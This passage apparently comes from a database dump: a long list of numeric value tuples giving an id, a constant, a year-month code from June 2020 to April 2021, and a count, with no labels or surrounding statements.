(1709,2,'202006',9),(1770,2,'202006',9),(2159,2,'202006',9),(471,2,'202006',10),(472,2,'202006',10),(1584,2,'202006',10),(1590,2,'202006',10),(1776,2,'202006',10),(1782,2,'202006',10),(2150,2,'202006',10),(2165,2,'202006',10),(2558,2,'202006',10),(478,2,'202006',11),(481,2,'202006',11),(482,2,'202006',11),(1592,2,'202006',11),(1705,2,'202006',11),(1713,2,'202006',11),(1732,2,'202006',11),(1778,2,'202006',11),(2156,2,'202006',11),(3023,2,'202006',11),(469,2,'202006',12),(477,2,'202006',12),(483,2,'202006',12),(485,2,'202006',12),(487,2,'202006',12),(488,2,'202006',12),(1544,2,'202006',12),(1610,2,'202006',12),(1612,2,'202006',12),(1699,2,'202006',12),(1715,2,'202006',12),(1720,2,'202006',12),(1749,2,'202006',12),(1751,2,'202006',12),(1768,2,'202006',12),(1772,2,'202006',12),(2161,2,'202006',12),(2248,2,'202006',12),(2252,2,'202006',12),(2293,2,'202006',12),(2296,2,'202006',12),(2704,2,'202006',12),(2748,2,'202006',12),(2965,2,'202006',12),(3004,2,'202006',12),(479,2,'202006',13),(1596,2,'202006',13),(1602,2,'202006',13),(1697,2,'202006',13),(1701,2,'202006',13),(1703,2,'202006',13),(1707,2,'202006',13),(1739,2,'202006',13),(1747,2,'202006',13),(2617,2,'202006',13),(2804,2,'202006',13),(3038,2,'202006',13),(480,2,'202006',14),(1608,2,'202006',14),(1695,2,'202006',14),(1726,2,'202006',14),(1774,2,'202006',14),(2063,2,'202006',14),(2658,2,'202006',14),(473,2,'202006',15),(484,2,'202006',15),(1594,2,'202006',15),(1724,2,'202006',15),(1737,2,'202006',15),(2152,2,'202006',15),(2809,2,'202006',15),(2964,2,'202006',15),(2989,2,'202006',15),(3072,2,'202006',15),(468,2,'202006',16),(1711,2,'202006',16),(1728,2,'202006',16),(1734,2,'202006',16),(1745,2,'202006',16),(1766,2,'202006',16),(2148,2,'202006',16),(2956,2,'202006',16),(470,2,'202006',17),(1598,2,'202006',17),(1743,2,'202006',17),(2154,2,'202006',17),(2178,2,'202006',17),(3005,2,'202006',17),(3027,2,'202006',17),(3041,2,'202006',17),(2775,2,'202006',18),(2911,2,'202006',18),(2993,2,'202006',18),(3006,2,'202006',18),(1718,2,'202006',19),(1722,2,'202006',19),(2297,2,'202006',20),(474,2,'202006',21),(3045,2,'202006',21),(3090,2,'202006',21),(1586,2,'202006',22),(2991,2,'202006',22),(3030,2,'202006',23),(3034,2,'202006',23),(486,2,'202006',24),(570,2,'202006',24),(1606,2,'202006',24),(3060,2,'202006',24),(1614,2,'202006',25),(1741,2,'202006',25),(3063,2,'202006',25),(1582,2,'202006',26),(2801,2,'202006',26),(3066,2,'202006',26),(2769,2,'202006',27),(2751,2,'202006',29),(1730,2,'202006',31),(2813,2,'202006',32),(1604,2,'202006',36),(3069,2,'202006',36),(2457,2,'202006',43),(1588,2,'202006',52),(1600,2,'202006',63),(2609,2,'202006',69),(2309,2,'202006',82),(472,2,'202007',11),(488,2,'202007',11),(1697,2,'202007',11),(3023,2,'202007',11),(476,2,'202007',12),(485,2,'202007',12),(1598,2,'202007',12),(1707,2,'202007',12),(1711,2,'202007',12),(1734,2,'202007',12),(1776,2,'202007',12),(2293,2,'202007',12),(467,2,'202007',13),(1590,2,'202007',13),(1592,2,'202007',13),(1709,2,'202007',13),(1713,2,'202007',13),(1726,2,'202007',13),(1737,2,'202007',13),(1745,2,'202007',13),(1747,2,'202007',13),(1768,2,'202007',13),(1770,2,'202007',13),(1772,2,'202007',13),(2297,2,'202007',13),(3004,2,'202007',13),(482,2,'202007',14),(1699,2,'202007',14),(1724,2,'202007',14),(1728,2,'202007',14),(1732,2,'202007',14),(1739,2,'202007',14),(1751,2,'202007',14),(1778,2,'202007',14),(2150,2,'202007',14),(2152,2,'202007',14),(2156,2,'202007',14),(2248,2,'202007',14),(2252,2,'202007',14),(2296,2,'202007',14),(479,2,'202007',15),(1544,2,'202007',15),(1584,2,'202007',15),(1610,2,'202007',15),(1774,2,'202007',15),(1780,2,'202007',15),(1782,2,'202007',15),(2159,2,'202007',15),(2161,2,'202007',15),(2704,2,'202007',15),(2748,2,'202007',15),(2804,2,'202007',15),(478,2,'202007',16),(480,2,'202007',16),(481,2,'202007',16),(483,2,'202007',16),(484,2,'202007',16),(1705,2,'202007',16),(1715,2,'202007',16),(1720,2,'202007',16),(2154,2,'202007',16),(2775,2,'202007',16),(2911,2,'202007',16),(2964,2,'202007',16),(2991,2,'202007',16),(3063,2,'202007',16),(469,2,'202007',17),(477,2,'202007',17),(1612,2,'202007',17),(1703,2,'202007',17),(1743,2,'202007',17),(2063,2,'202007',17),(2148,2,'202007',17),(2165,2,'202007',17),(2558,2,'202007',17),(2956,2,'202007',17),(1594,2,'202007',18),(1602,2,'202007',18),(1608,2,'202007',18),(1701,2,'202007',18),(1722,2,'202007',18),(1741,2,'202007',18),(2178,2,'202007',18),(2658,2,'202007',18),(3006,2,'202007',18),(3041,2,'202007',18),(468,2,'202007',19),(474,2,'202007',19),(1695,2,'202007',19),(1749,2,'202007',19),(1766,2,'202007',19),(2965,2,'202007',19),(2993,2,'202007',19),(3034,2,'202007',19),(3072,2,'202007',19),(3079,2,'202007',19),(487,2,'202007',20),(1586,2,'202007',20),(2809,2,'202007',20),(3087,2,'202007',20),(3102,2,'202007',20),(3104,2,'202007',20),(3107,2,'202007',20),(470,2,'202007',21),(471,2,'202007',21),(3045,2,'202007',21),(3066,2,'202007',21),(3109,2,'202007',21),(486,2,'202007',22),(2989,2,'202007',22),(3005,2,'202007',22),(3038,2,'202007',22),(3081,2,'202007',22),(3083,2,'202007',22),(2617,2,'202007',23),(3096,2,'202007',23),(1718,2,'202007',24),(2751,2,'202007',25),(3027,2,'202007',25),(570,2,'202007',26),(473,2,'202007',27),(1582,2,'202007',27),(1596,2,'202007',28),(2457,2,'202007',28),(3092,2,'202007',30),(3097,2,'202007',30),(1730,2,'202007',32),(1614,2,'202007',33),(2769,2,'202007',34),(2813,2,'202007',34),(3030,2,'202007',38),(3060,2,'202007',40),(1606,2,'202007',44),(3069,2,'202007',44),(2801,2,'202007',49),(1604,2,'202007',51),(3090,2,'202007',51),(2609,2,'202007',56),(1588,2,'202007',85),(2309,2,'202007',88),(1600,2,'202007',95),(1768,2,'202008',11),(2558,2,'202008',11),(2748,2,'202008',11),(478,2,'202008',12),(482,2,'202008',12),(1590,2,'202008',12),(2296,2,'202008',12),(479,2,'202008',13),(488,2,'202008',13),(1695,2,'202008',13),(1711,2,'202008',13),(467,2,'202008',14),(472,2,'202008',14),(476,2,'202008',14),(483,2,'202008',14),(1584,2,'202008',14),(2964,2,'202008',14),(3038,2,'202008',14),(471,2,'202008',15),(2965,2,'202008',15),(3041,2,'202008',15),(3097,2,'202008',15),(1544,2,'202008',16),(1612,2,'202008',16),(1697,2,'202008',16),(1741,2,'202008',16),(2293,2,'202008',16),(2297,2,'202008',16),(2704,2,'202008',16),(3004,2,'202008',16),(3023,2,'202008',16),(3124,2,'202008',16),(1608,2,'202008',17),(1705,2,'202008',17),(1772,2,'202008',17),(2150,2,'202008',17),(2804,2,'202008',17),(2911,2,'202008',17),(3066,2,'202008',17),(3117,2,'202008',17),(484,2,'202008',18),(487,2,'202008',18),(1713,2,'202008',18),(1743,2,'202008',18),(1747,2,'202008',18),(1749,2,'202008',18),(2993,2,'202008',18),(3034,2,'202008',18),(3079,2,'202008',18),(480,2,'202008',19),(481,2,'202008',19),(1701,2,'202008',19),(1703,2,'202008',19),(1715,2,'202008',19),(1732,2,'202008',19),(1751,2,'202008',19),(1776,2,'202008',19),(2809,2,'202008',19),(2991,2,'202008',19),(3087,2,'202008',19),(3096,2,'202008',19),(477,2,'202008',20),(1610,2,'202008',20),(1720,2,'202008',20),(1724,2,'202008',20),(1778,2,'202008',20),(1782,2,'202008',20),(2152,2,'202008',20),(2154,2,'202008',20),(3063,2,'202008',20),(469,2,'202008',21),(474,2,'202008',21),(485,2,'202008',21),(1709,2,'202008',21),(1734,2,'202008',21),(1739,2,'202008',21),(1774,2,'202008',21),(2148,2,'202008',21),(2161,2,'202008',21),(2165,2,'202008',21),(2617,2,'202008',21),(2775,2,'202008',21),(3006,2,'202008',21),(3045,2,'202008',21),(3072,2,'202008',21),(3092,2,'202008',21),(1594,2,'202008',22),(1602,2,'202008',22),(1699,2,'202008',22),(1722,2,'202008',22),(1737,2,'202008',22),(1745,2,'202008',22),(2156,2,'202008',22),(2178,2,'202008',22),(2248,2,'202008',22),(3005,2,'202008',22),(1592,2,'202008',23),(1726,2,'202008',23),(1728,2,'202008',23),(1770,2,'202008',23),(2159,2,'202008',23),(1606,2,'202008',24),(2063,2,'202008',24),(3027,2,'202008',24),(470,2,'202008',25),(1598,2,'202008',25),(1707,2,'202008',25),(1766,2,'202008',25),(3083,2,'202008',25),(468,2,'202008',27),(1780,2,'202008',27),(2813,2,'202008',27),(3127,2,'202008',27),(1718,2,'202008',28),(2252,2,'202008',28),(3081,2,'202008',28),(3090,2,'202008',28),(3107,2,'202008',28),(2658,2,'202008',29),(2801,2,'202008',29),(570,2,'202008',30),(486,2,'202008',31),(3069,2,'202008',31),(1586,2,'202008',32),(473,2,'202008',33),(1596,2,'202008',34),(2769,2,'202008',34),(2956,2,'202008',35),(3060,2,'202008',35),(3102,2,'202008',35),(1730,2,'202008',36),(2989,2,'202008',36),(3104,2,'202008',36),(2457,2,'202008',37),(3030,2,'202008',37),(3109,2,'202008',37),(1582,2,'202008',47),(2751,2,'202008',48),(2609,2,'202008',51),(1588,2,'202008',53),(1604,2,'202008',53),(1614,2,'202008',65),(2309,2,'202008',66),(1600,2,'202008',85),(3140,2,'202009',1),(3142,2,'202009',1),(3144,2,'202009',1),(3151,2,'202009',1),(2964,2,'202009',18),(484,2,'202009',20),(1747,2,'202009',20),(1697,2,'202009',21),(2911,2,'202009',21),(472,2,'202009',22),(479,2,'202009',22),(1705,2,'202009',23),(1715,2,'202009',23),(482,2,'202009',24),(1741,2,'202009',24),(2558,2,'202009',24),(3041,2,'202009',24),(1734,2,'202009',25),(3117,2,'202009',25),(476,2,'202009',26),(1720,2,'202009',26),(1728,2,'202009',26),(2965,2,'202009',26),(3063,2,'202009',26),(3096,2,'202009',26),(2154,2,'202009',27),(2704,2,'202009',27),(3072,2,'202009',27),(3124,2,'202009',27),(483,2,'202009',28),(2178,2,'202009',28),(2993,2,'202009',28),(1701,2,'202009',29),(1732,2,'202009',29),(1774,2,'202009',29),(3023,2,'202009',29),(478,2,'202009',30),(485,2,'202009',30),(488,2,'202009',30),(1711,2,'202009',30),(1737,2,'202009',30),(2150,2,'202009',30),(3079,2,'202009',30),(3092,2,'202009',30),(3097,2,'202009',30),(1707,2,'202009',31),(1745,2,'202009',31),(1751,2,'202009',31),(1780,2,'202009',31),(2156,2,'202009',31),(2296,2,'202009',31),(2991,2,'202009',31),(3006,2,'202009',31),(3087,2,'202009',31),(480,2,'202009',32),(1544,2,'202009',32),(1584,2,'202009',32),(1602,2,'202009',32),(1610,2,'202009',32),(1739,2,'202009',32),(1749,2,'202009',32),(1768,2,'202009',32),(1782,2,'202009',32),(2293,2,'202009',32),(3004,2,'202009',32),(3066,2,'202009',32),(469,2,'202009',33),(1608,2,'202009',33),(1612,2,'202009',33),(1703,2,'202009',33),(2063,2,'202009',33),(2161,2,'202009',33),(2956,2,'202009',33),(3038,2,'202009',33),(467,2,'202009',34),(1590,2,'202009',34),(1596,2,'202009',34),(1709,2,'202009',34),(1726,2,'202009',34),(1770,2,'202009',34),(2252,2,'202009',34),(2813,2,'202009',34),(1695,2,'202009',35),(1699,2,'202009',35),(2165,2,'202009',35),(2809,2,'202009',35),(1722,2,'202009',36),(1766,2,'202009',36),(2748,2,'202009',36),(471,2,'202009',37),(1743,2,'202009',37),(1776,2,'202009',37),(2617,2,'202009',37),(2804,2,'202009',37),(3005,2,'202009',37),(3027,2,'202009',37),(3034,2,'202009',37),(3045,2,'202009',37),(3083,2,'202009',37),(1724,2,'202009',38),(1772,2,'202009',38),(2148,2,'202009',38),(2152,2,'202009',38),(2248,2,'202009',38),(1730,2,'202009',39),(1778,2,'202009',39),(2297,2,'202009',39),(477,2,'202009',40),(481,2,'202009',40),(3104,2,'202009',40),(470,2,'202009',41),(487,2,'202009',41),(1592,2,'202009',41),(2769,2,'202009',41),(3090,2,'202009',41),(468,2,'202009',42),(3081,2,'202009',42),(474,2,'202009',43),(1598,2,'202009',43),(2159,2,'202009',43),(2775,2,'202009',43),(3109,2,'202009',43),(486,2,'202009',44),(1718,2,'202009',44),(2989,2,'202009',44),(570,2,'202009',45),(3102,2,'202009',46),(1713,2,'202009',47),(1594,2,'202009',49),(2801,2,'202009',49),(3060,2,'202009',49),(473,2,'202009',50),(3069,2,'202009',50),(3107,2,'202009',52),(3030,2,'202009',53),(3127,2,'202009',54),(1604,2,'202009',55),(1582,2,'202009',57),(1586,2,'202009',57),(2658,2,'202009',60),(2751,2,'202009',61),(1606,2,'202009',62),(2609,2,'202009',62),(1588,2,'202009',71),(2457,2,'202009',71),(1614,2,'202009',79),(2309,2,'202009',97),(1600,2,'202009',121),(1741,2,'202010',13),(482,2,'202010',14),(1602,2,'202010',14),(1715,2,'202010',15),(1722,2,'202010',16),(476,2,'202010',17),(485,2,'202010',17),(2964,2,'202010',17),(3023,2,'202010',17),(480,2,'202010',18),(1709,2,'202010',18),(1778,2,'202010',18),(2558,2,'202010',18),(1707,2,'202010',19),(467,2,'202010',20),(479,2,'202010',20),(1610,2,'202010',20),(1697,2,'202010',20),(2152,2,'202010',20),(2252,2,'202010',20),(2809,2,'202010',20),(2911,2,'202010',20),(477,2,'202010',21),(481,2,'202010',21),(1612,2,'202010',21),(1699,2,'202010',21),(1726,2,'202010',21),(1728,2,'202010',21),(1734,2,'202010',21),(2297,2,'202010',21),(2775,2,'202010',21),(2804,2,'202010',21),(3063,2,'202010',21),(3092,2,'202010',21),(483,2,'202010',22),(1544,2,'202010',22),(1590,2,'202010',22),(1703,2,'202010',22),(1730,2,'202010',22),(1751,2,'202010',22),(1776,2,'202010',22),(2748,2,'202010',22),(3004,2,'202010',22),(3027,2,'202010',22),(3081,2,'202010',22),(3090,2,'202010',22),(468,2,'202010',23),(472,2,'202010',23),(1596,2,'202010',23),(1705,2,'202010',23),(1711,2,'202010',23),(1772,2,'202010',23),(2150,2,'202010',23),(2154,2,'202010',23),(2178,2,'202010',23),(2704,2,'202010',23),(2991,2,'202010',23),(3005,2,'202010',23),(3045,2,'202010',23),(469,2,'202010',24),(1720,2,'202010',24),(1743,2,'202010',24),(1745,2,'202010',24),(1747,2,'202010',24),(1774,2,'202010',24),(2063,2,'202010',24),(2993,2,'202010',24),(3041,2,'202010',24),(1608,2,'202010',25),(1739,2,'202010',25),(1749,2,'202010',25),(1780,2,'202010',25),(1782,2,'202010',25),(2293,2,'202010',25),(2965,2,'202010',25),(486,2,'202010',26),(2148,2,'202010',26),(3034,2,'202010',26),(3107,2,'202010',26),(478,2,'202010',27),(1695,2,'202010',27),(1701,2,'202010',27),(1713,2,'202010',27),(2161,2,'202010',27),(3006,2,'202010',27),(3079,2,'202010',27),(3083,2,'202010',27),(1584,2,'202010',28),(1718,2,'202010',28),(1766,2,'202010',28),(1770,2,'202010',28),(2248,2,'202010',28),(2813,2,'202010',28),(2989,2,'202010',28),(3030,2,'202010',28),(3124,2,'202010',28),(488,2,'202010',29),(1592,2,'202010',29),(2296,2,'202010',29),(3038,2,'202010',29),(3066,2,'202010',29),(3072,2,'202010',29),(3096,2,'202010',29),(1724,2,'202010',30),(1732,2,'202010',30),(2457,2,'202010',30),(3060,2,'202010',30),(3087,2,'202010',30),(1598,2,'202010',31),(1737,2,'202010',31),(1768,2,'202010',31),(2769,2,'202010',31),(3104,2,'202010',31),(3127,2,'202010',31),(1594,2,'202010',32),(2156,2,'202010',32),(2956,2,'202010',32),(3117,2,'202010',32),(470,2,'202010',33),(487,2,'202010',33),(570,2,'202010',33),(2159,2,'202010',33),(2617,2,'202010',33),(2751,2,'202010',33),(3097,2,'202010',33),(3109,2,'202010',33),(471,2,'202010',34),(484,2,'202010',34),(3102,2,'202010',34),(2165,2,'202010',35),(473,2,'202010',37),(474,2,'202010',38),(2801,2,'202010',38),(1582,2,'202010',44),(2658,2,'202010',45),(2609,2,'202010',46),(1606,2,'202010',47),(1586,2,'202010',48),(3069,2,'202010',48),(1588,2,'202010',56),(1614,2,'202010',59),(2309,2,'202010',61),(1604,2,'202010',63),(1600,2,'202010',88),(110,2,'202102',1),(106,2,'202102',5),(3038,2,'202102',8),(3124,2,'202102',8),(3290,2,'202102',8),(3297,2,'202102',8),(102,2,'202102',9),(1726,2,'202102',10),(3092,2,'202102',10),(3269,2,'202102',10),(480,2,'202102',11),(488,2,'202102',11),(2748,2,'202102',11),(3249,2,'202102',11),(3265,2,'202102',11),(1695,2,'202102',12),(1720,2,'202102',12),(1728,2,'202102',12),(1782,2,'202102',12),(2252,2,'202102',12),(2704,2,'202102',12),(2809,2,'202102',12),(3006,2,'202102',12),(3023,2,'202102',12),(3063,2,'202102',12),(3072,2,'202102',12),(3102,2,'202102',12),(3229,2,'202102',12),(3240,2,'202102',12),(3245,2,'202102',12),(3247,2,'202102',12),(3261,2,'202102',12),(3316,2,'202102',12),(469,2,'202102',13),(471,2,'202102',13),(484,2,'202102',13),(1715,2,'202102',13),(1732,2,'202102',13),(1751,2,'202102',13),(1772,2,'202102',13),(1778,2,'202102',13),(2152,2,'202102',13),(2964,2,'202102',13),(2965,2,'202102',13),(2993,2,'202102',13),(3267,2,'202102',13),(3278,2,'202102',13),(1705,2,'202102',14),(1734,2,'202102',14),(1749,2,'202102',14),(1768,2,'202102',14),(2154,2,'202102',14),(2161,2,'202102',14),(2296,2,'202102',14),(3027,2,'202102',14),(3041,2,'202102',14),(3273,2,'202102',14),(3307,2,'202102',14),(476,2,'202102',15),(1584,2,'202102',15),(1699,2,'202102',15),(1770,2,'202102',15),(1776,2,'202102',15),(1780,2,'202102',15),(2148,2,'202102',15),(2248,2,'202102',15),(2293,2,'202102',15),(2991,2,'202102',15),(3004,2,'202102',15),(3271,2,'202102',15),(3275,2,'202102',15),(3313,2,'202102',15),(3438,2,'202102',15),(472,2,'202102',16),(483,2,'202102',16),(485,2,'202102',16),(2150,2,'202102',16),(486,2,'202102',17),(1703,2,'202102',17),(1713,2,'202102',17),(1743,2,'202102',17),(1747,2,'202102',17),(3034,2,'202102',17),(3096,2,'202102',17),(3251,2,'202102',17),(3263,2,'202102',17),(478,2,'202102',18),(1707,2,'202102',18),(1739,2,'202102',18),(1745,2,'202102',18),(2156,2,'202102',18),(3253,2,'202102',18),(1741,2,'202102',19),(2165,2,'202102',19),(2804,2,'202102',19),(3066,2,'202102',19),(477,2,'202102',20),(482,2,'202102',20),(1697,2,'202102',20),(1709,2,'202102',20),(1711,2,'202102',20),(3079,2,'202102',20),(3104,2,'202102',20),(3243,2,'202102',20),(3259,2,'202102',20),(1737,2,'202102',21),(3090,2,'202102',21),(3226,2,'202102',21),(479,2,'202102',22),(1701,2,'202102',22),(1724,2,'202102',22),(1730,2,'202102',22),(3097,2,'202102',22),(3430,2,'202102',22),(1722,2,'202102',23),(2063,2,'202102',23),(2911,2,'202102',23),(3087,2,'202102',23),(3107,2,'202102',23),(3109,2,'202102',23),(1774,2,'202102',24),(2297,2,'202102',24),(3060,2,'202102',24),(474,2,'202102',25),(2178,2,'202102',25),(2989,2,'202102',25),(1766,2,'202102',26),(2457,2,'202102',26),(3083,2,'202102',26),(3257,2,'202102',26),(481,2,'202102',27),(2558,2,'202102',27),(2658,2,'202102',27),(2801,2,'202102',27),(2813,2,'202102',28),(3479,2,'202102',28),(3498,2,'202102',28),(1610,2,'202102',29),(1718,2,'202102',29),(2751,2,'202102',29),(3030,2,'202102',30),(3127,2,'202102',30),(487,2,'202102',32),(2956,2,'202102',32),(570,2,'202102',33),(2617,2,'202102',33),(3069,2,'202102',33),(473,2,'202102',34),(1544,2,'202102',34),(468,2,'202102',35),(470,2,'202102',36),(1612,2,'202102',36),(2775,2,'202102',37),(467,2,'202102',38),(1590,2,'202102',38),(1598,2,'202102',38),(3005,2,'202102',38),(1606,2,'202102',39),(2609,2,'202102',39),(1592,2,'202102',40),(1596,2,'202102',41),(2159,2,'202102',41),(3486,2,'202102',42),(1604,2,'202102',43),(1608,2,'202102',43),(3287,2,'202102',43),(3282,2,'202102',44),(3285,2,'202102',44),(3280,2,'202102',46),(3482,2,'202102',46),(335,2,'202102',47),(87,2,'202102',48),(1588,2,'202102',48),(108,2,'202102',50),(1602,2,'202102',50),(2904,2,'202102',53),(2769,2,'202102',54),(3117,2,'202102',54),(74,2,'202102',55),(2503,2,'202102',58),(72,2,'202102',59),(3489,2,'202102',63),(84,2,'202102',64),(1594,2,'202102',64),(76,2,'202102',72),(89,2,'202102',72),(1582,2,'202102',79),(68,2,'202102',87),(2309,2,'202102',91),(1600,2,'202102',92),(91,2,'202102',102),(1614,2,'202102',124),(3045,2,'202102',124),(1586,2,'202102',164),(80,2,'202102',168),(9,2,'202102',2173),(106,2,'202103',8),(110,2,'202103',11),(3117,2,'202103',11),(479,2,'202103',12),(1705,2,'202103',12),(2809,2,'202103',12),(2965,2,'202103',12),(1724,2,'202103',13),(1768,2,'202103',13),(3240,2,'202103',13),(3438,2,'202103',13),(1747,2,'202103',14),(1772,2,'202103',14),(2152,2,'202103',14),(3090,2,'202103',14),(3247,2,'202103',14),(476,2,'202103',15),(478,2,'202103',15),(483,2,'202103',15),(1711,2,'202103',15),(1722,2,'202103',15),(1739,2,'202103',15),(1749,2,'202103',15),(3063,2,'202103',15),(3096,2,'202103',15),(3124,2,'202103',15),(3275,2,'202103',15),(3297,2,'202103',15),(477,2,'202103',16),(482,2,'202103',16),(486,2,'202103',16),(1701,2,'202103',16),(1730,2,'202103',16),(2991,2,'202103',16),(3027,2,'202103',16),(3243,2,'202103',16),(1703,2,'202103',17),(1728,2,'202103',17),(1751,2,'202103',17),(2956,2,'202103',17),(2993,2,'202103',17),(3023,2,'202103',17),(3229,2,'202103',17),(3269,2,'202103',17),(3290,2,'202103',17),(3316,2,'202103',17),(1743,2,'202103',18),(1770,2,'202103',18),(2150,2,'202103',18),(2156,2,'202103',18),(3087,2,'202103',18),(1695,2,'202103',19),(1726,2,'202103',19),(1734,2,'202103',19),(1741,2,'202103',19),(2252,2,'202103',19),(2293,2,'202103',19),(2296,2,'202103',19),(2748,2,'202103',19),(2964,2,'202103',19),(3045,2,'202103',19),(3109,2,'202103',19),(3245,2,'202103',19),(3249,2,'202103',19),(3251,2,'202103',19),(3265,2,'202103',19),(102,2,'202103',20),(471,2,'202103',20),(480,2,'202103',20),(1697,2,'202103',20),(1732,2,'202103',20),(2248,2,'202103',20),(3006,2,'202103',20),(3253,2,'202103',20),(3263,2,'202103',20),(3430,2,'202103',20),(484,2,'202103',21),(485,2,'202103',21),(1707,2,'202103',21),(1745,2,'202103',21),(1776,2,'202103',21),(1780,2,'202103',21),(1782,2,'202103',21),(3004,2,'202103',21),(3066,2,'202103',21),(3104,2,'202103',21),(3267,2,'202103',21),(3313,2,'202103',21),(469,2,'202103',22),(481,2,'202103',22),(1715,2,'202103',22),(1737,2,'202103',22),(2617,2,'202103',22),(3060,2,'202103',22),(3069,2,'202103',22),(3079,2,'202103',22),(3271,2,'202103',22),(3273,2,'202103',22),(3307,2,'202103',22),(472,2,'202103',23),(1584,2,'202103',23),(1590,2,'202103',23),(2063,2,'202103',23),(3041,2,'202103',23),(3107,2,'202103',23),(3257,2,'202103',23),(3278,2,'202103',23),(487,2,'202103',24),(1720,2,'202103',24),(2558,2,'202103',24),(3097,2,'202103',24),(3102,2,'202103',24),(3226,2,'202103',24),(488,2,'202103',25),(1699,2,'202103',25),(1709,2,'202103',25),(2704,2,'202103',25),(2804,2,'202103',25),(2148,2,'202103',26),(2165,2,'202103',26),(3038,2,'202103',26),(3261,2,'202103',27),(3486,2,'202103',27),(2801,2,'202103',28),(3034,2,'202103',28),(3092,2,'202103',28),(3259,2,'202103',28),(1766,2,'202103',29),(1778,2,'202103',29),(2658,2,'202103',29),(2751,2,'202103',29),(1774,2,'202103',30),(2178,2,'202103',30),(3479,2,'202103',30),(2161,2,'202103',31),(2989,2,'202103',32),(3005,2,'202103',32),(474,2,'202103',33),(3280,2,'202103',33),(3482,2,'202103',33),(470,2,'202103',34),(2775,2,'202103',34),(2911,2,'202103',35),(1718,2,'202103',36),(2813,2,'202103',36),(1713,2,'202103',37),(3072,2,'202103',38),(2154,2,'202103',39),(3127,2,'202103',39),(2297,2,'202103',40),(468,2,'202103',41),(3083,2,'202103',42),(1610,2,'202103',43),(1592,2,'202103',47),(473,2,'202103',49),(1588,2,'202103',53),(3541,2,'202103',53),(570,2,'202103',54),(1544,2,'202103',57),(3285,2,'202103',60),(3287,2,'202103',62),(2609,2,'202103',63),(3282,2,'202103',64),(335,2,'202103',69),(1608,2,'202103',69),(1596,2,'202103',70),(467,2,'202103',71),(1606,2,'202103',72),(3498,2,'202103',72),(1612,2,'202103',76),(3030,2,'202103',78),(74,2,'202103',79),(84,2,'202103',82),(3531,2,'202103',82),(1604,2,'202103',83),(1594,2,'202103',91),(108,2,'202103',92),(2457,2,'202103',92),(2904,2,'202103',93),(1614,2,'202103',95),(2159,2,'202103',96),(3534,2,'202103',96),(1598,2,'202103',97),(3489,2,'202103',99),(72,2,'202103',101),(1582,2,'202103',104),(2503,2,'202103',106),(87,2,'202103',111),(89,2,'202103',116),(76,2,'202103',118),(2769,2,'202103',122),(1602,2,'202103',129),(68,2,'202103',142),(2309,2,'202103',159),(1600,2,'202103',195),(91,2,'202103',209),(80,2,'202103',238),(1586,2,'202103',289),(9,2,'202103',3458),(106,2,'202104',3),(110,2,'202104',4),(478,2,'202104',13),(1730,2,'202104',13),(1772,2,'202104',13),(3124,2,'202104',13),(482,2,'202104',14),(488,2,'202104',14),(3257,2,'202104',14),(102,2,'202104',15),(1703,2,'202104',15),(1739,2,'202104',15),(2965,2,'202104',15),(3090,2,'202104',15),(479,2,'202104',16),(1713,2,'202104',16),(3063,2,'202104',16),(484,2,'202104',17),(1701,2,'202104',17),(1734,2,'202104',17),(1737,2,'202104',17),(2152,2,'202104',17),(2165,2,'202104',17),(3096,2,'202104',17),(3247,2,'202104',17),(483,2,'202104',18),(1741,2,'202104',18),(1743,2,'202104',18),(1766,2,'202104',18),(2293,2,'202104',18),(3245,2,'202104',18),(3249,2,'202104',18),(3271,2,'202104',18),(3275,2,'202104',18),(1745,2,'202104',19),(1751,2,'202104',19),(1782,2,'202104',19),(3069,2,'202104',19),(3240,2,'202104',19),(477,2,'202104',20),(485,2,'202104',20),(486,2,'202104',20),(1707,2,'202104',20),(1715,2,'202104',20),(1732,2,'202104',20),(1747,2,'202104',20),(1768,2,'202104',20),(2252,2,'202104',20),(2296,2,'202104',20),(3066,2,'202104',20),(3263,2,'202104',20),(3267,2,'202104',20),(3278,2,'202104',20),(3316,2,'202104',20),(1697,2,'202104',21),(1699,2,'202104',21),(1705,2,'202104',21),(1778,2,'202104',21),(2156,2,'202104',21),(2748,2,'202104',21),(2964,2,'202104',21),(2991,2,'202104',21),(2993,2,'202104',21),(3229,2,'202104',21),(3280,2,'202104',21),(3307,2,'202104',21),(1722,2,'202104',22),(2178,2,'202104',22),(3104,2,'202104',22),(3109,2,'202104',22),(3265,2,'202104',22),(469,2,'202104',23),(480,2,'202104',23),(1584,2,'202104',23),(1711,2,'202104',23),(1720,2,'202104',23),(1724,2,'202104',23),(1749,2,'202104',23),(1780,2,'202104',23),(2063,2,'202104',23),(3087,2,'202104',23),(3273,2,'202104',23),(476,2,'202104',24),(1728,2,'202104',24),(2658,2,'202104',24),(3023,2,'202104',24),(3097,2,'202104',24),(3486,2,'202104',24),(1776,2,'202104',25),(3107,2,'202104',25),(3259,2,'202104',25),(3290,2,'202104',25),(3297,2,'202104',25),(474,2,'202104',26),(1695,2,'202104',26),(1709,2,'202104',26),(2148,2,'202104',26),(2161,2,'202104',26),(2248,2,'202104',26),(2558,2,'202104',26),(3004,2,'202104',26),(3006,2,'202104',26),(3269,2,'202104',26),(3479,2,'202104',26),(1590,2,'202104',27),(1770,2,'202104',27),(2150,2,'202104',27),(2813,2,'202104',27),(3117,2,'202104',27),(3226,2,'202104',27),(3251,2,'202104',27),(471,2,'202104',28),(2775,2,'202104',28),(3127,2,'202104',28),(3482,2,'202104',28),(2911,2,'202104',29),(2989,2,'202104',29),(3092,2,'202104',29),(2609,2,'202104',30),(2809,2,'202104',30),(3034,2,'202104',30),(3045,2,'202104',30),(3243,2,'202104',30),(3253,2,'202104',30),(3313,2,'202104',30),(3430,2,'202104',30),(472,2,'202104',31),(3027,2,'202104',31),(473,2,'202104',32),(1774,2,'202104',32),(2751,2,'202104',32),(3041,2,'202104',32),(3072,2,'202104',32),(3261,2,'202104',32),(2154,2,'202104',33),(3079,2,'202104',33),(3102,2,'202104',33),(3438,2,'202104',33),(481,2,'202104',34),(3083,2,'202104',34),(2801,2,'202104',35),(2804,2,'202104',35),(3038,2,'202104',35),(470,2,'202104',36),(1726,2,'202104',38),(1544,2,'202104',39),(2297,2,'202104',40),(2956,2,'202104',40),(3005,2,'202104',40),(1610,2,'202104',43),(2617,2,'202104',44),(487,2,'202104',45),(1718,2,'202104',48),(3060,2,'202104',48),(3030,2,'202104',50),(2159,2,'202104',52),(2704,2,'202104',54),(1588,2,'202104',56),(468,2,'202104',58),(1612,2,'202104',58),(1592,2,'202104',60),(467,2,'202104',63),(1606,2,'202104',63),(1604,2,'202104',67),(3285,2,'202104',70),(570,2,'202104',71),(1614,2,'202104',71),(2457,2,'202104',72),(